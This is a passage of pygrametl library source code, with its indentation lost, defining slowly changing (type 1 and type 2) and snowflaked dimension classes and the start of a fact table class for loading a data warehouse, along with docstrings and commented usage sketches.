self._after_getbykey(newkeyvalue, tmp)
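# A hypothetical sketch of a CachedDimension with a rowexpander, illustrating
# how expensive derived attributes can be computed only for members that are
# not already present. The expanddate function and attribute names are
# assumptions, and the standard library datetime module is assumed imported.
#
#     def expanddate(row, namemapping):
#         d = datetime.date(row['year'], row['month'], row['day'])
#         row['weekday'] = d.isoweekday()   # only computed for new members
#         return row
#
#     datedim = CachedDimension(
#         name='date',
#         key='dateid',
#         attributes=['day', 'month', 'year', 'weekday'],
#         lookupatts=['day', 'month', 'year'],
#         rowexpander=expanddate,
#         prefill=True)
#     key = datedim.ensure({'day': 24, 'month': 12, 'year': 2015})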
class TypeOneSlowlyChangingDimension(CachedDimension):
"""A class for accessing a slowly changing dimension of "type 1".
Caching is used. We assume that the DB doesn't change or add any
attribute values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, lookupatts, type1atts=(),
cachesize=10000, prefill=False, idfinder=None,
usefetchfirst=False, targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- lookupatts: A subset of the attributes that uniquely identify
a dimension member. These attributes are thus used for looking
up members.
- type1atts: A sequence of attributes that should have type1 updates
applied; it cannot intersect with lookupatts. If not given, it is
assumed that type1atts = attributes - lookupatts
- cachesize: the maximum number of rows to cache. If less than or
equal to 0, unlimited caching is used. Default: 10000
- prefill: a flag deciding if the cache should be filled when
initialized. Default: False
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
clause is used when prefill is True. Depending on the used DBMS
and DB driver, this can give significant savings with respect to
time and memory. Not all DBMSs support this clause yet. Default: False
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
CachedDimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=None,
rowexpander=None,
size=cachesize,
prefill=prefill,
cachefullrows=False,
cacheoninsert=True,
usefetchfirst=usefetchfirst,
targetconnection=targetconnection)
if type1atts == ():
type1atts = list(set(attributes) - set(lookupatts))
elif not set(type1atts) < set(attributes):
raise ValueError("Type1atts is not a subset of attributes")
elif set(lookupatts) & set(type1atts):
raise ValueError("Intersection between lookupatts and type1atts")
# Ensures "lookupatts != attributes" as it prevents type 1 updates
if not len(type1atts):
raise ValueError("Type1atts contain no attributes")
self.type1atts = type1atts
def scdensure(self, row, namemapping={}):
"""Lookup or insert a version of a slowly changing dimension member.
.. Note:: Has side-effects on the given row.
Arguments:
- row: a dict containing the attributes for the table. It must
contain all attributes if it is the first version of the row to be
inserted. Updates of existing rows need only contain lookupatts
and a subset of type1atts; a missing type1att is ignored and
the existing value is left as is in the database.
- namemapping: an optional namemapping (see module's documentation)
"""
# NOTE: the "vals2key" cache is kept coherent by "scdensure", as it only
# contains "lookupatts" which "scdensure" is prohibited from changing
keyval = self.lookup(row, namemapping)
key = (namemapping.get(self.key) or self.key)
if keyval is None:
# The first version of the row is inserted
keyval = self.insert(row, namemapping)
row[key] = keyval
else:
# The row did exist so we update the type1atts provided
row[key] = keyval
# Takes the user provided namemapping into account and checks what
# subset of type1atts should be updated based on the content of row
type1atts = []
for att in self.type1atts:
if (namemapping.get(att) or att) in row:
type1atts.append(att)
if not type1atts:
return
# The SQL is constructed to update only the changed values without
# the need for looking up the old row to extract the existing
# values
updatesql = "UPDATE " + self.name + " SET " + \
", ".join(["%s = %%(%s)s" % \
(att, att) for att in type1atts]) + \
" WHERE %s = %%(%s)s" % (key, key)
# Update is not used, to skip the checks for updates to the caches
self.targetconnection.execute(updatesql, row, namemapping)
return row[key]
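# A hypothetical sketch of a type 1 slowly changing dimension where changed
# attribute values simply overwrite the old ones. The table and attribute
# names are assumptions.
#
#     customerdim = TypeOneSlowlyChangingDimension(
#         name='customer',
#         key='customerid',
#         attributes=['cname', 'city', 'segment'],
#         lookupatts=['cname'],
#         type1atts=['city', 'segment'])
#     # If 'Ann' already exists, her city/segment are updated in place;
#     # otherwise a new member is inserted.
#     customerdim.scdensure({'cname': 'Ann', 'city': 'Aalborg',
#                            'segment': 'B2C'})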
class SlowlyChangingDimension(Dimension):
"""A class for accessing a slowly changing dimension of "type 2".
"Type 1" updates can also be applied for a subset of the attributes.
Caching is used. We assume that the DB doesn't change or add any
attribute values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, lookupatts, versionatt,
fromatt=None, fromfinder=None,
toatt=None, tofinder=None, minfrom=None, maxto=None,
srcdateatt=None, srcdateparser=pygrametl.ymdparser,
type1atts=(), cachesize=10000, prefill=False, idfinder=None,
usefetchfirst=False, targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument, but should include versionatt,
fromatt, and toatt.
- lookupatts: a sequence with a subset of the attributes that
uniquely identify a dimension member. These attributes are thus
used for looking up members.
- versionatt: the name of the attribute holding the version number
- fromatt: the name of the attribute telling from when the version
becomes valid. Not used if None. Default: None
- fromfinder: a function(targetconnection, row, namemapping)
returning a value for the fromatt for a new version (the function
is first used when it is determined that a new version must be
added; it is not applied to determine this).
If fromfinder is None and srcdateatt is also None,
pygrametl.today is used as fromfinder. If fromfinder is None
and srcdateatt is not None,
pygrametl.datereader(srcdateatt, srcdateparser) is used.
In other words, if no date attribute and no special
date function are given, new versions get the date of the current
day. If a date attribute is given (but no date function), the
date attribute's value is converted (by means of srcdateparser)
and a new version gets the result of this as the date it is valid
from. Default: None
- toatt: the name of the attribute telling until when the version
is valid. Not used if None. Default: None
- tofinder: a function(targetconnection, row, namemapping)
returning a value for the toatt. If not set, fromfinder is used
(note that if fromfinder is None, it is set to a default
function -- see the comments about fromfinder. The possibly
modified value is used here.) Default: None
- minfrom: the value to use for fromatt for the 1st version of a
member if fromatt is not already set. If None, the value is
found in the same way as for other new versions, i.e., as
described for fromfinder. If fromatt should take the value
NULL for the 1st version, set minfrom to a tuple holding a single
element which is None: (None,). Note that minfrom affects the 1st
version, not any following versions. Note also that if the member
to insert already contains a value for fromatt, minfrom is ignored.
Default: None.
- maxto: the value to use for toatt for new members. Default: None
- srcdateatt: the name of the attribute in the source data that
holds a date showing when a version is valid from. The data is
converted to a datetime by applying srcdateparser on it.
If not None, the date attribute is also used when comparing
a potential new version to the newest version in the DB.
If None, the date fields are not compared. Default: None
- srcdateparser: a function that takes one argument (a date in the
format srcdateatt has) and returns a datetime.datetime.
If srcdateatt is None, srcdateparser is not used.
Default: pygrametl.ymdparser (i.e., the default value is a
function that parses a string of the form 'yyyy-MM-dd')
- type1atts: a sequence of attributes that should have type1 updates
applied. Default: ()
- cachesize: the maximum size of the cache. 0 disables caching
and values smaller than 0 allow unlimited caching
- prefill: decides if the cache should be prefilled with the newest
versions. Default: False. NB: This is a new argument in ver. 0.2.0.
- idfinder: a function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
clause is used when prefill is True. Depending on the used DBMS
and DB driver, this can give significant savings with respect to
time and memory. Not all DBMSs support this clause yet. Default: False
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
# TODO: Should scdensure just override ensure instead of being a new
# method?
Dimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=None,
rowexpander=None,
targetconnection=targetconnection)
if not versionatt:
raise ValueError('A version attribute must be given')
self.versionatt = versionatt
self.fromatt = fromatt
if fromfinder is not None:
self.fromfinder = fromfinder
elif srcdateatt is not None: # and fromfinder is None
self.fromfinder = pygrametl.datereader(srcdateatt, srcdateparser)
else: # fromfinder is None and srcdateatt is None
self.fromfinder = pygrametl.today
self.toatt = toatt
if tofinder is None:
tofinder = self.fromfinder
self.tofinder = tofinder
self.minfrom = minfrom
self.maxto = maxto
self.srcdateatt = srcdateatt
self.srcdateparser = srcdateparser
self.type1atts = type1atts
if cachesize > 0:
self.rowcache = FIFODict(cachesize)
self.keycache = FIFODict(cachesize)
elif cachesize < 0:
self.rowcache = {}
self.keycache = {}
# else cachesize == 0 and we do not create any caches
self.__cachesize = cachesize
self.__prefill = prefill
# Check that versionatt, fromatt and toatt are also declared as
# attributes
for var in (versionatt, fromatt, toatt):
if var and var not in attributes:
raise ValueError("%s not present in attributes argument" %
(var,))
# Now extend the SQL from Dimension such that we use the versioning
self.keylookupsql += " ORDER BY %s DESC" % (versionatt,)
if toatt:
self.updatetodatesql = \
"UPDATE %s SET %s = %%(%s)s WHERE %s = %%(%s)s" % \
(name, toatt, toatt, key, key)
if prefill:
self.__prefillcaches(usefetchfirst)
def __prefillcaches(self, usefetchfirst):
args = None
if self.toatt:
# We can use the toatt to see if rows are still current.
# Select all attributes from the rows where maxto is set to the
# default value (which may be NULL)
sql = 'SELECT %s FROM %s WHERE %s %s' % \
(', '.join(self.all), self.name, self.toatt,
self.maxto is None and 'IS NULL' or '= %(maxto)s')
if self.maxto is not None:
args = {'maxto': self.maxto}
else:
# We have to find max(versionatt) for each group of lookupatts and
# do a join to get the right rows.
lookupattlist = ', '.join(self.lookupatts)
newestversions = ('SELECT %s, MAX(%s) AS %s FROM %s GROUP BY %s' %
(lookupattlist, self.versionatt, self.versionatt, self.name,
lookupattlist))
joincond = ' AND '.join(['A.%s = B.%s' % (att, att) for att in
[l for l in self.lookupatts] +
[self.versionatt]
])
sql = 'SELECT %s FROM (%s) AS A, %s AS B WHERE %s' %\
(', '.join(['B.%s AS %s' % (att, att) for att in self.all]),
newestversions, self.name, joincond)
# sql is a statement that fetches the newest versions from the database
# in order to fill the caches, the FETCH FIRST clause is for a finite
# cache, if the user set the flag that it is supported by the database.
positions = [self.all.index(att) for att in self.lookupatts]
if self.__cachesize > 0 and usefetchfirst:
sql += ' FETCH FIRST %d ROWS ONLY' % self.__cachesize
self.targetconnection.execute(sql, args)
for rawrow in self.targetconnection.fetchmanytuples(self.__cachesize):
self.rowcache[rawrow[0]] = rawrow
t = tuple([rawrow[i] for i in positions])
self.keycache[t] = rawrow[0]
def lookup(self, row, namemapping={}):
"""Find the key for the newest version with the given values.
Arguments:
- row: a dict which must contain at least the lookup attributes
- namemapping: an optional namemapping (see module's documentation)
"""
if self.__prefill and (self.__cachesize < 0 or
len(self.keycache) < self.__cachesize):
# Everything is cached. We don't have to look in the DB
return self._before_lookup(row, namemapping)
else:
# Something is not cached so we have to use the classical lookup.
# Note that __init__ updated self.keylookupsql to use ORDER BY ...
return Dimension.lookup(self, row, namemapping)
def scdensure(self, row, namemapping={}):
"""Lookup or insert a version of a slowly changing dimension member.
.. Note:: Has side-effects on the given row.
Arguments:
- row: a dict containing the attributes for the member.
key, versionatt, fromatt, and toatt are not required to be
present but will be added (if defined).
- namemapping: an optional namemapping (see module's documentation)
"""
versionatt = (namemapping.get(self.versionatt) or self.versionatt)
key = (namemapping.get(self.key) or self.key)
if self.fromatt: # this protects us against None in namemapping.
fromatt = (namemapping.get(self.fromatt) or self.fromatt)
else:
fromatt = None
if self.toatt:
toatt = (namemapping.get(self.toatt) or self.toatt)
else:
toatt = None
if self.srcdateatt:
srcdateatt = (namemapping.get(self.srcdateatt) or self.srcdateatt)
else:
srcdateatt = None
# Get the newest version and compare to that
keyval = self.lookup(row, namemapping)
if keyval is None:
# It is a new member. We add the first version.
row[versionatt] = 1
if fromatt and fromatt not in row:
if self.minfrom is not None:
# We need the following hack to distinguish between
# 'not set' and 'use the value None'...
if self.minfrom == (None,):
row[fromatt] = None
else:
row[fromatt] = self.minfrom
else:
row[fromatt] = self.fromfinder(self.targetconnection,
row, namemapping)
if toatt and toatt not in row:
row[toatt] = self.maxto
row[key] = self.insert(row, namemapping)
return row[key]
else:
# There is an existing version. Check if the attributes are
# identical
type1updates = {} # for type 1
addnewversion = False # for type 2
other = self.getbykey(keyval) # the full existing version
for att in self.all:
# Special (non-)handling of versioning and key attributes:
if att in (self.key, self.versionatt, self.toatt):
# Don't compare these - we don't expect them to have
# meaningful values in row
continue
# We may have to compare the "from dates"
elif att == self.fromatt:
if self.srcdateatt is None: # We don't compare dates then
continue
else:
# We have to compare the dates in row[..] and other[..].
# We have to make sure that the dates are of comparable
# types.
rdt = self.srcdateparser(row[srcdateatt])
if rdt == other[self.fromatt]:
continue # no change in the "from attribute"
elif isinstance(rdt, type(other[self.fromatt])):
# they are not equal but are of the same type, so we
# are dealing with a new date
addnewversion = True
else:
# They have different types (and are thus not
# equal). Try to convert to strings and see if they
# are equal.
modref = self.targetconnection.getunderlyingmodule()
rowdate = modref.Date(rdt.year, rdt.month, rdt.day)
if str(rowdate).strip('\'"') != \
str(other[self.fromatt]).strip('\'"'):
addnewversion = True
# Handling of "normal" attributes:
else:
mapped = (namemapping.get(att) or att)
if row[mapped] != other[att]:
if att in self.type1atts:
type1updates[att] = row[mapped]
else:
addnewversion = True
if addnewversion and not self.type1atts:
# We don't have to look for possible type 1 updates
# and we already know that a type 2 update is needed.
break
# else: continue
if len(type1updates) > 0:
# Some type 1 updates were found
self.__performtype1updates(type1updates, other)
if addnewversion: # type 2
# Make a new row version and insert it
row.pop(key, None)
row[versionatt] = other[self.versionatt] + 1
if fromatt:
row[fromatt] = self.fromfinder(self.targetconnection,
row, namemapping)
if toatt:
row[toatt] = self.maxto
row[key] = self.insert(row, namemapping)
# Update the todate attribute in the old row version in the DB.
if toatt:
toattval = self.tofinder(self.targetconnection, row,
namemapping)
self.targetconnection.execute(
self.updatetodatesql, {
self.key: keyval, self.toatt: toattval})
# Only cache the newest version - this is new in ver. 0.2.0!
if keyval in self.rowcache:
del self.rowcache[keyval]
else:
# Update the row dict by giving version and dates and the key
row[key] = keyval
row[versionatt] = other[self.versionatt]
if self.fromatt:
row[fromatt] = other[self.fromatt]
if self.toatt:
row[toatt] = other[self.toatt]
return row[key]
def _before_lookup(self, row, namemapping):
if self.__cachesize:
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
return self.keycache.get(searchtuple, None)
return None
def _after_lookup(self, row, namemapping, resultkey):
if self.__cachesize and resultkey is not None:
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
self.keycache[searchtuple] = resultkey
def _before_getbykey(self, keyvalue):
if self.__cachesize:
res = self.rowcache.get(keyvalue)
if res is not None:
return dict(zip(self.all, res))
return None
def _after_getbykey(self, keyvalue, resultrow):
if self.__cachesize and resultrow[self.key] is not None:
# if resultrow[self.key] is None, no result was found in the db
self.rowcache[keyvalue] = tuple([resultrow[a] for a in self.all])
def _before_update(self, row, namemapping):
""" """
# We have to remove old values from the caches.
key = (namemapping.get(self.key) or self.key)
for att in self.lookupatts:
if (att in namemapping or att in row):
# A lookup attribute is about to be changed and we should make
# sure that the cache does not map from the old value. Here,
# we can only see the new value, but we can get the old lookup
# values by means of the key:
oldrow = self.getbykey(row[key])
namesinrow = [(namemapping.get(a) or a)
for a in self.lookupatts]
searchtuple = tuple([oldrow[n] for n in namesinrow])
if searchtuple in self.keycache:
del self.keycache[searchtuple]
break
if row[key] in self.rowcache:
# The cached row is now incorrect. We must make sure it is
# not in the cache.
del self.rowcache[row[key]]
return None
def _after_insert(self, row, namemapping, newkeyvalue):
""" """
# After the insert, we can look it up. Pretend that we
# did that. Then we get the new data cached.
# NB: Here we assume that the DB doesn't change or add anything.
# For example, a DEFAULT value in the DB or automatic type coercion can
# break this assumption.
# Note that we always cache inserted members (in CachedDimension
# this is an option).
if self.__cachesize:
self._after_lookup(row, namemapping, newkeyvalue)
tmp = pygrametl.project(self.all[1:], row, namemapping)
tmp[self.key] = newkeyvalue
self._after_getbykey(newkeyvalue, tmp)
def __performtype1updates(self, updates, lookupvalues, namemapping={}):
""" """
# find the keys in the rows that should be updated
self.targetconnection.execute(self.keylookupsql, lookupvalues,
namemapping)
updatekeys = [e[0] for e in self.targetconnection.fetchalltuples()]
updatekeys.reverse()
# Generate SQL for the update
valparts = ", ".join(["%s = %%(%s)s" % (k, k) for k in updates])
keyparts = ", ".join([str(k) for k in updatekeys])
sql = "UPDATE %s SET %s WHERE %s IN (%s)" % \
(self.name, valparts, self.key, keyparts)
self.targetconnection.execute(sql, updates)
# Remove from our own cache
for key in updatekeys:
if key in self.rowcache:
del self.rowcache[key]
SCDimension = SlowlyChangingDimension
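# A hypothetical sketch of a type 2 slowly changing dimension where a changed
# attribute value leads to a new row version with validity dates. The table
# and attribute names are assumptions; since no srcdateatt is given,
# pygrametl.today is used as the fromfinder.
#
#     customerdim = SlowlyChangingDimension(
#         name='customer',
#         key='customerid',
#         attributes=['cname', 'city', 'version', 'validfrom', 'validto'],
#         lookupatts=['cname'],
#         versionatt='version',
#         fromatt='validfrom',
#         toatt='validto',
#         cachesize=-1)
#     # The first call inserts version 1; the later call with a new city
#     # inserts version 2 and closes the old version by setting its validto.
#     customerdim.scdensure({'cname': 'Ann', 'city': 'Aalborg'})
#     customerdim.scdensure({'cname': 'Ann', 'city': 'Aarhus'})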
# NB: SnowflakedDimension's methods may have side-effects:
# row[somedim.key] = someval.
class SnowflakedDimension(object):
"""A class for accessing a snowflaked dimension spanning several tables
in the underlying database. Lookups and inserts are then automatically
spread out over the relevant tables while the programmer only needs
to interact with a single SnowflakedDimension instance.
"""
def __init__(self, references, expectboguskeyvalues=False):
"""Arguments:
- references: a sequence of pairs of Dimension objects
[(a1,a2), (b1,b2), ...] meaning that a1 has a foreign key to a2
etc. a2 may itself be a sequence of Dimensions:
[(a1, [a21, a22, ...]), (b1, [b21, b22, ...]), ...].
The first element of the first pair (a1 in the example above) must
be the dimension table representing the lowest level in the
hierarchy (i.e., the dimension table the closest to the fact
table).
Each dimension must be reachable in a unique way (i.e., the
given dimensions form a tree).
A foreign key must have the same name as the primary key it
references.
- expectboguskeyvalues: If expectboguskeyvalues is True, we allow a
key that is used as lookup attribute in a lower level to hold a
wrong value (which would typically be None). When ensure or
insert is called, we find the correct value for the key in the
higher level. If expectboguskeyvalues, we again try a lookup on
the lower level after this. If expectboguskeyvalues is False, we
move directly on to do an insert. Default: False
"""
self.root = references[0][0]
self.targetconnection = self.root.targetconnection
self.key = self.root.key
self.lookupatts = self.root.lookupatts
dims = set([self.root])
self.refs = {}
self.refkeys = {}
self.all = self.root.all[:]
for (dim, refeddims) in references:
# Check that all dimensions use the same target connection.
# Build the dict self.refs:
# {dimension -> set(refed dimensions)}
# Build self.all from dimensions' lists
# Keep track of seen dimensions by means of the set dims and
# ensure that each table is only reachable once.
if isinstance(refeddims, Dimension):
# If there is only one dimension, then make a tuple with that
refeddims = (refeddims, )
for rd in refeddims:
if rd.targetconnection is not self.targetconnection:
raise ValueError("Different connections used")
if rd in dims:
raise ValueError("The tables do not form a tree")
dims.add(rd)
tmp = self.refs.get(dim, set())
tmp.add(rd)
self.refs[dim] = tmp
# The key is already there as we assume FKs and PKs have
# identical names
self.all.extend(list(rd.attributes))
# Check that all dimensions in dims are reachable from the root
dimscopy = dims.copy()
dimscopy.remove(self.root)
for (tbl, targets) in self.refs.items():
for target in targets:
# It is safe to use remove as each dim is only referenced once
dimscopy.remove(target)
# Those dimensions that are left in dimscopy at this point are unreachable
if len(dimscopy) != 0:
raise ValueError("Not every given dimension is reachable")
# Construct SQL...
self.keylookupsql = self.root.keylookupsql
self.allnames = []
for dim in dims:
for att in dim.attributes:
self.allnames.append(att)
# Make sure that there are no duplicated names:
if len(self.allnames) != len(set(self.allnames)):
raise ValueError("Duplicated attribute names found")
self.alljoinssql = "SELECT " + ", ".join(self.allnames) + \
" FROM " + " NATURAL JOIN ".join(map(lambda d: d.name, dims))
self.rowlookupsql = self.alljoinssql + " WHERE %s.%s = %%(%s)s" % \
(self.root.name, self.root.key, self.root.key)
self.levels = {}
self.__buildlevels(self.root, 0)
self.levellist = list(range(len(self.levels)))
self.levellist.reverse()
self.expectboguskeyvalues = expectboguskeyvalues
def __buildlevels(self, node, level):
tmp = self.levels.get(level, [])
tmp.append(node)
self.levels[level] = tmp
for ref in self.refs.get(node, []):
self.__buildlevels(ref, level + 1)
def lookup(self, row, namemapping={}):
"""Find the key for the row with the given values.
Arguments:
- row: a dict which must contain at least the lookup attributes
which all must come from the root (the table closest to the
fact table).
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_lookup(row, namemapping)
if res:
return res
res = self.root.lookup(row, namemapping)
self._after_lookup(row, namemapping, res)
return res
def _before_lookup(self, row, namemapping):
return None
def _after_lookup(self, row, namemapping, resultkeyvalue):
pass
def getbykey(self, keyvalue, fullrow=False):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
Arguments:
- keyvalue: the key value of the row to lookup
- fullrow: a flag deciding if the full row (with data from
all tables in the snowflake) should be returned. If False,
only data from the lowest level in the hierarchy (i.e., the table
the closest to the fact table) is returned. Default: False
"""
res = self._before_getbykey(keyvalue, fullrow)
if res:
return res
if not fullrow:
res = self.root.getbykey(keyvalue)
else:
self.targetconnection.execute(self.rowlookupsql,
{self.root.key: keyvalue})
res = self.targetconnection.fetchone(self.allnames)
self._after_getbykey(keyvalue, res, fullrow)
return res
def _before_getbykey(self, keyvalue, fullrow=False):
return None
def _after_getbykey(self, keyvalue, resultrow, fullrow=False):
pass
def getbyvals(self, values, namemapping={}, fullrow=False):
"""Return a list of all rows with values identical to the given.
Arguments:
- values: a dict which must hold a subset of the tables attributes.
All rows that have identical values for all attributes in this
dict are returned.
- namemapping: an optional namemapping (see module's documentation)
- fullrow: a flag deciding if the full row (with data from
all tables in the snowflake) should be returned. If False,
only data from the lowest level in the hierarchy (i.e., the table
the closest to the fact table) is returned. Default: False
"""
res = self._before_getbyvals(values, namemapping)
if res is not None:
return res
if not fullrow:
res = self.root.getbyvals(values, namemapping)
else:
# select all attributes from the table.
# The attributes available from the
# values dict are used in the WHERE clause.
attstouse = [a for a in self.allnames
if a in values or a in namemapping]
sqlwhere = " WHERE " + \
" AND ".join(["%s = %%(%s)s" % (att, att) for att in attstouse])
self.targetconnection.execute(self.alljoinssql + sqlwhere,
values, namemapping)
res = [r for r in self.targetconnection.rowfactory(self.allnames)]
self._after_getbyvals(values, namemapping, res)
return res
def _before_getbyvals(self, values, namemapping, fullrow=False):
return None
def _after_getbyvals(self, values, namemapping, resultrows, fullrow=False):
pass
def update(self, row, namemapping={}):
"""Update rows in the participating dimension tables.
If the key of a participating dimension D is in the given row,
D.update(...) is invoked.
Note that this function is not good to use for updating a foreign
key which here has the same name as the referenced primary key: The
referenced table could then also get updated unless it is ensured
that none of its attributes are present in the given row.
In other words, it is often better to use the update function
directly on the Dimensions that should be updated.
Arguments:
- row: a dict. If the key of a participating dimension D is in the
dict, D.update(...) is invoked.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_update(row, namemapping)
if res is not None:
return
for l in self.levellist:
for t in self.levels[l]:
if t.key in row or \
(t.key in namemapping and namemapping[t.key] in row):
t.update(row, namemapping)
self._after_update(row, namemapping)
def _before_update(self, row, namemapping):
return None
def _after_update(self, row, namemapping):
pass
def ensure(self, row, namemapping={}):
"""Lookup the given member. If that fails, insert it. Return key value.
If the member must be inserted, data is automatically inserted in
all participating tables where (part of) the member is not
already represented.
Key values for different levels may be added to the row. It is
NOT guaranteed that key values for all levels exist in row
afterwards.
Arguments:
- row: the row to lookup or insert. Must contain the lookup
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
(key, ignored) = self.__ensure_helper(self.root, row, namemapping,
False)
return key
def insert(self, row, namemapping={}):
"""Insert the given member. If that fails, insert it. Return key value.
Data is automatically inserted in all participating tables where
(part of) the member is not already represented. If nothing is
inserted at all, a ValueError is raised.
Key values for different levels may be added to the row. It is
NOT guaranteed that key values for all levels exist in row
afterwards.
Arguments:
- row: the row to lookup or insert. Must contain the lookup
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
key = self._before_insert(row, namemapping)
if key is not None:
return key
(key, insertdone) = self.__ensure_helper(self.root, row, namemapping,
False)
if not insertdone:
raise ValueError("Member already present - nothing inserted")
self._after_insert(row, namemapping, key)
return key
def _before_insert(self, row, namemapping):
return None
def _after_insert(self, row, namemapping, newkeyvalue):
pass
def endload(self):
"""Finalize the load."""
pass
def __ensure_helper(self, dimension, row, namemapping, insertdone):
""" """
# NB: Has side-effects: Key values are set for all dimensions
key = None
retry = False
try:
key = dimension.lookup(row, namemapping)
except KeyError:
retry = True # it can happen that the keys for the levels above
# aren't there yet but should be used as lookup
# attributes in dimension.
# Below we find them and we should then try a
# lookup again before we move on to do an insertion
if key is not None:
row[(namemapping.get(dimension.key) or dimension.key)] = key
return (key, insertdone)
# Else recursively get keys for refed tables and then insert
for refed in self.refs.get(dimension, []):
(key, insertdone) = self.__ensure_helper(refed, row, namemapping,
insertdone)
# We don't need to set the key value in the row as this already
# happened in the recursive step.
# We set insertdone = True to know later that we actually
# inserted something
if retry or self.expectboguskeyvalues:
# The following is similar to
# key = dimension.ensure(row, namemapping)
# but we set insertdone here.
key = dimension.lookup(row, namemapping)
if key is None:
key = dimension.insert(row, namemapping)
insertdone = True
else:
# We don't need to lookup again since no attributes were
# missing (no KeyError) and we don't expect bogus values.
# So we can proceed directly to do an insert.
key = dimension.insert(row, namemapping)
insertdone = True
row[(namemapping.get(dimension.key) or dimension.key)] = key
return (key, insertdone)
def scdensure(self, row, namemapping={}):
"""Lookup or insert a version of a slowly changing dimension member.
.. Warning::
Still experimental!!! For now we require that only the
root is a SlowlyChangingDimension.
.. Note:: Has side-effects on the given row.
Arguments:
- row: a dict containing the attributes for the member.
- namemapping: an optional namemapping (see module's documentation)
"""
# Still experimental!!! For now we require that only the
# root is a SlowlyChangingDimension.
# If we were to allow other nodes to be SCDs, we should require
# that those between those nodes and the root (incl.) were also
# SCDs.
for dim in self.levels.get(1, []):
(keyval, ignored) = self.__ensure_helper(dim, row, namemapping,
False)
row[(namemapping.get(dim.key) or dim.key)] = keyval
row[(namemapping.get(self.root.key) or self.root.key)] = \
self.root.scdensure(row, namemapping)
return row[(namemapping.get(self.root.key) or self.root.key)]
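# A hypothetical sketch of a snowflaked dimension. The three underlying
# Dimension objects and their tables are assumptions; the pairs in the
# references argument state that productdim has a foreign key to categorydim
# and categorydim has one to departmentdim, forming a tree with productdim
# (the table closest to the fact table) as the root.
#
#     productdim = Dimension(name='product', key='productid',
#                            attributes=['pname', 'categoryid'],
#                            lookupatts=['pname'])
#     categorydim = Dimension(name='category', key='categoryid',
#                             attributes=['cname', 'departmentid'],
#                             lookupatts=['cname'])
#     departmentdim = Dimension(name='department', key='departmentid',
#                               attributes=['dname'], lookupatts=['dname'])
#     snowflake = SnowflakedDimension(
#         [(productdim, categorydim), (categorydim, departmentdim)])
#     key = snowflake.ensure({'pname': 'Beer', 'cname': 'Drinks',
#                             'dname': 'Groceries'})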
class FactTable(object):
"""A class for accessing a fact table in the DW."""
def __init__(self, name, keyrefs, measures=(), targetconnection=None):
"""Arguments:
- name: the name of the fact table in the DW
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact tables (i.e., the dimension references)
- measures: a possibly empty sequence of measure names. Default: ()
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
if targetconnection is None:
targetconnection = pygrametl.getdefaulttargetconnection()
self.targetconnection = targetconnection
self.name = name
self.keyrefs = keyrefs
self.measures = measures
self.all = [k for k in keyrefs] + [m for m in measures]
pygrametl._alltables.append(self)
# Create SQL
# INSERT INTO name (key1, ..., keyn, meas1, ..., measn)
# VALUES (%(key1)s, ..., %(keyn)s, %(meas1)s, ..., %(measn)s)
self.insertsql = "INSERT INTO " + name + "(" + \
", ".join(self.all) + ") VALUES (" + \
", ".join(["%%(%s)s" % (att,) for att in self.all]) + ")"
# SELECT key1, ..., keyn, meas1, ..., measn FROM name
# WHERE key1 = %(key1)s AND ... keyn = %(keyn)s
self.lookupsql = "SELECT " + ",".join(self.all) + " FROM " + name + \
" WHERE " + " AND ".join(["%s = %%(%s)s" % (k, k)
for k in self.keyrefs])
def insert(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
tmp = self._before_insert(row, namemapping)
if tmp:
return
self.targetconnection.execute(self.insertsql, row, namemapping)
self._after_insert(row, namemapping)
def _before_insert(self, row, namemapping):
return None
def _after_insert(self, row, namemapping):
pass
def _emptyfacttonone(self, argdict):
"""Return None if the given argument only contains None values,
otherwise return the given argument
"""
for k in self.keyrefs:
if argdict[k] is not None:
return argdict
return None
def lookup(self, keyvalues, namemapping={}):
"""Lookup a fact from the given key values. Return key and measure vals.
Return None if no fact is found.
Arguments:
- keyvalues: a dict at least containing values for all keys
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_lookup(keyvalues, namemapping)
if res:
return self._emptyfacttonone(res)
self.targetconnection.execute(self.lookupsql, keyvalues, namemapping)
res = self.targetconnection.fetchone(self.all)
self._after_lookup(keyvalues, namemapping, res)
return self._emptyfacttonone(res)
def _before_lookup(self, keyvalues, namemapping):
return None
def _after_lookup(self, keyvalues, namemapping, resultrow):
pass
def ensure(self, row, compare=False, namemapping={}):
"""Ensure that a fact is present (insert it if it is not already there).
Arguments:
- row: a dict at least containing the attributes of the fact table
